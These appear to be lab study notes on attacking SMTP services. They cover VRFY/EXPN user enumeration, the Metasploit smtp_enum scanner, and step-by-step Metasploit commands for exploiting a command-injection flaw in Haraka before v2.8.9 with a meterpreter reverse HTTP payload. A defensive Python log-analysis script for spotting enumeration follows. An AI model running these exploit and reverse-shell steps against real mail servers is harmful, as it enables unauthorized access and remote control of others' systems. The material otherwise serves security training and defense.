**SMTP (Simple Mail Transfer Protocol)** [Port: 25 or 465 or 587]


SMTP is a communication protocol used for the transmission of email.

  • SMTP uses TCP port 25 by default. It can also be configured to run on TCP ports 465 and 587.
  • We can utilize auxiliary modules to enumerate the version of SMTP as well as user accounts on the target system.

Search for the auxiliary SMTP modules:

search type:auxiliary name:smtp

To connect to an SMTP server we use netcat: nc <ip> <port>

  • The SMTP service has two internal commands that allow the enumeration of users:
  • VRFY: confirms the names of valid users.
  • EXPN: reveals the actual addresses behind user aliases and e-mail lists (mailing lists).

Haraka SMTP server:

Haraka is an open-source, high-performance SMTP server developed in Node.js. The Haraka SMTP server comes with a plugin for processing attachments. Haraka versions prior to v2.8.9 are vulnerable to command injection.

MSF Module:
exploit/linux/smtp/haraka 

Then

set rhost <target_ip>

Then

set SRVPORT 9898

Then

set email_to root@attackdefense.test

Then set a staged payload:

set payload linux/x64/meterpreter_reverse_http

set LHOST <attacking_IP>

MSF Modules:

This module is very useful for collecting existing usernames on the target:

auxiliary/scanner/smtp/smtp_enum

  • set UNIXONLY false if you are not working on a Linux target.
  • Also select a proper USER_FILE based on the target.
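
From the defender's side, the VRFY/EXPN enumeration and the smtp_enum scan described above show up in mail logs as bursts of mailbox-probing commands from one client. The following is an added example, not part of the original notes: the log format, the `find_enumeration` function, the threshold and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed (hypothetical) log format: <timestamp> client=<ip> cmd="<SMTP command>" reply=<code>
LINE_RE = re.compile(
    r'^\S+ client=(?P<ip>\S+) cmd="(?P<verb>[A-Za-z]+)(?: (?P<arg>[^"]*))?" reply=(?P<code>\d{3})$'
)
PROBE_VERBS = {"VRFY", "EXPN"}
# Replies that confirm or deny a mailbox; 252 ("cannot VRFY") reveals nothing.
LEAKY_CODES = {"250", "251", "550", "551", "553"}
# Constructed sample log, not taken from a real server.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z client=10.0.0.5 cmd="HELO probe" reply=250
2024-05-01T10:00:02Z client=10.0.0.5 cmd="VRFY root" reply=250
2024-05-01T10:00:02Z client=10.0.0.5 cmd="VRFY admin" reply=550
2024-05-01T10:00:03Z client=10.0.0.5 cmd="VRFY backup" reply=550
2024-05-01T10:00:03Z client=10.0.0.5 cmd="EXPN staff" reply=250
2024-05-01T10:00:04Z client=10.0.0.5 cmd="RCPT TO:<oracle@example.test>" reply=550
2024-05-01T10:01:10Z client=10.0.0.9 cmd="MAIL FROM:<bob@example.test>" reply=250
2024-05-01T10:01:11Z client=10.0.0.9 cmd="RCPT TO:<alice@example.test>" reply=250
2024-05-01T10:01:12Z client=10.0.0.9 cmd="DATA" reply=354
2024-05-01T10:02:00Z client=10.0.0.7 cmd="VRFY postmaster" reply=252
"""


def find_enumeration(log_text, min_probes=3):
    """Summarise clients whose mailbox-probing commands reach min_probes."""
    stats = defaultdict(lambda: {"probes": 0, "names": set(), "leaked": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines outside the assumed format
        verb, code = m["verb"].upper(), m["code"]
        # VRFY/EXPN always count; RCPT counts only when the mailbox is rejected.
        if not (verb in PROBE_VERBS or (verb == "RCPT" and code.startswith("55"))):
            continue
        s = stats[m["ip"]]
        s["probes"] += 1
        s["names"].add((m["arg"] or "").lower())
        s["leaked"] += int(code in LEAKY_CODES)  # server confirmed or denied the name
    return {ip: {"probes": s["probes"], "distinct_names": len(s["names"]),
                 "leaked_answers": s["leaked"]}
            for ip, s in stats.items() if s["probes"] >= min_probes}


if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))
```

A non-zero `leaked_answers` count means the server is answering probes with replies that distinguish valid from invalid mailboxes, which is the behaviour to remove by disabling VRFY/EXPN or answering 252.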